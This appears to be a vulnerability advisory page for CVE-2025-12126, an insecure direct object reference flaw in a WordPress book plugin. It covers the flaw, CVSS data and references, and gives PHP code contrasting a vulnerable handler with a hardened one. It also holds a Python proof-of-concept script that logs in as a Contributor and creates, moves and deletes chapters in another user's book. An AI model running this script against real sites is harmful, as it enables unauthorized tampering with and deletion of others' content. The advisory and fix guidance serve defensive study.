Security Vulnerability Report
CVE-2025-12126 CVSS 5.4 MEDIUM

CVE-2025-12126

Published: 2025-11-11 04:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Total Book Project plugin for WordPress is vulnerable to Insecure Direct Object Reference (CWE-639) in all versions up to, and including, 1.0. Several functions act on a user-controlled key (the book or chapter identifier) without validating that the caller is authorized for that object. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform actions such as moving, deleting, or creating chapters in books that do not belong to them.
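The defect class above is an authorization bug, not an input-validation bug: the handler accepts an object ID from the request and acts on it without checking that the logged-in user may touch that object. The following is an added example, not code from the Total Book Project plugin, showing a hypothetical WordPress admin-ajax handler in the IDOR-prone shape the description implies and then in a hardened form. All names (`tbp_*` functions, the `tbp_book` and `tbp_chapter` post types, the `parent_book` meta key, the `tbp_move_chapter` nonce action) are assumptions chosen for illustration.

```php
<?php
// Added example (not the plugin's code). Names below are hypothetical:
// tbp_* functions, post types 'tbp_book'/'tbp_chapter', meta key 'parent_book'.

// Vulnerable pattern: 'wp_ajax_' hooks only fire for logged-in users, so the
// caller is authenticated, but nothing ties $book_id or $chapter_id to the
// caller. Any Contributor can pass another user's IDs.
function tbp_insecure_move_chapter() {
    $book_id    = (int) $_POST['book_id'];    // user-controlled key, trusted as-is
    $chapter_id = (int) $_POST['chapter_id'];
    update_post_meta( $chapter_id, 'parent_book', $book_id );
    wp_send_json_success();
}

// Hardened pattern: nonce for intent, then an object-level authorization check
// on every ID taken from the request, including a post-type check so an ID of
// some unrelated post cannot be substituted.
function tbp_secure_move_chapter() {
    check_ajax_referer( 'tbp_move_chapter', 'nonce' ); // CSRF check only; not authz

    $book_id    = isset( $_POST['book_id'] ) ? absint( $_POST['book_id'] ) : 0;
    $chapter_id = isset( $_POST['chapter_id'] ) ? absint( $_POST['chapter_id'] ) : 0;

    if ( ! tbp_user_may_edit_object( $book_id, 'tbp_book' )
        || ! tbp_user_may_edit_object( $chapter_id, 'tbp_chapter' ) ) {
        // Same response for "does not exist" and "not yours": no ID enumeration oracle.
        wp_send_json_error( array( 'message' => 'Not permitted.' ), 403 );
    }

    update_post_meta( $chapter_id, 'parent_book', $book_id );
    wp_send_json_success();
}

// Object-level authorization helper: the post must exist, be of the expected
// type, and the current user must hold the edit_post meta capability for that
// specific post. For a Contributor this resolves to their own unpublished
// posts, which is exactly the ownership boundary the vulnerable handler lacked.
function tbp_user_may_edit_object( $post_id, $expected_type ) {
    $post = get_post( $post_id );
    if ( ! $post || $post->post_type !== $expected_type ) {
        return false;
    }
    return current_user_can( 'edit_post', $post->ID );
}

add_action( 'wp_ajax_tbp_move_chapter', 'tbp_secure_move_chapter' );
```

Two points a reviewer would check when applying this pattern to a real plugin: `check_ajax_referer()` proves the request came from a page the user loaded, not that the user is allowed to modify the referenced object, so a handler that verifies a nonce but skips the `current_user_can( 'edit_post', $id )` step is still an IDOR; and `edit_post` only maps to per-object ownership for custom post types registered with `map_meta_cap => true`, otherwise the capability check degrades to a role-wide permission and the ownership comparison must be done explicitly against `$post->post_author`.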

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

The Total Book Project plugin for WordPress <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-12126 PoC - WordPress Total Book Project IDOR
# Authenticated Contributor+ can manipulate chapters in other users' books
import requests

TARGET_URL = "http://target-wordpress-site.com"
ATTACKER_USERNAME = "attacker"
ATTACKER_PASSWORD = "attacker_password"
TARGET_BOOK_ID = 123  # Victim's book ID (not owned by attacker)


def exploit_idor():
    """
    Exploit IDOR vulnerability in Total Book Project plugin.

    Steps:
    1. Authenticate as Contributor user
    2. Identify target book ID belonging to another user
    3. Manipulate chapter operations via IDOR
    """
    session = requests.Session()

    # Step 1: Login as Contributor user
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': ATTACKER_USERNAME,
        'pwd': ATTACKER_PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    session.post(login_url, data=login_data)

    # Step 2: Create chapter in victim's book (IDOR)
    create_chapter_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    create_data = {
        'action': 'total_book_create_chapter',
        'book_id': TARGET_BOOK_ID,  # IDOR: Using victim's book ID
        'chapter_title': 'Malicious Chapter',
        'chapter_content': 'Injected content via IDOR',
        'nonce': 'attacker_obtained_nonce'  # Need valid nonce from page source
    }
    response = session.post(create_chapter_url, data=create_data)
    print(f"Create chapter response: {response.status_code}")

    # Step 3: Move chapter in victim's book (IDOR)
    move_chapter_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    move_data = {
        'action': 'total_book_move_chapter',
        'book_id': TARGET_BOOK_ID,  # IDOR vulnerability
        'chapter_id': 456,  # Chapter to move
        'new_position': 1
    }
    response = session.post(move_chapter_url, data=move_data)
    print(f"Move chapter response: {response.status_code}")

    # Step 4: Delete chapter in victim's book (IDOR)
    delete_chapter_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    delete_data = {
        'action': 'total_book_delete_chapter',
        'book_id': TARGET_BOOK_ID,  # IDOR vulnerability
        'chapter_id': 789  # Chapter to delete
    }
    response = session.post(delete_chapter_url, data=delete_data)
    print(f"Delete chapter response: {response.status_code}")

    return True


if __name__ == "__main__":
    exploit_idor()
```

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3392629%40the-total-book-project&new=3392629%40the-total-book-project
https://wordpress.org/plugins/the-total-book-project/
https://www.wordfence.com/threat-intel/vulnerabilities/id/e1b473fd-2444-4a54-b558-4656634a6903?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-12126", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:46.333", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The The Total Book Project plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.0 via several functions due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform several actions like moving/deleting/creating chapters in books that do not belong to them."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3392629%40the-total-book-project&new=3392629%40the-total-book-project", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/the-total-book-project/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e1b473fd-2444-4a54-b558-4656634a6903?source=cve", "source": "[email protected]"}]}}
```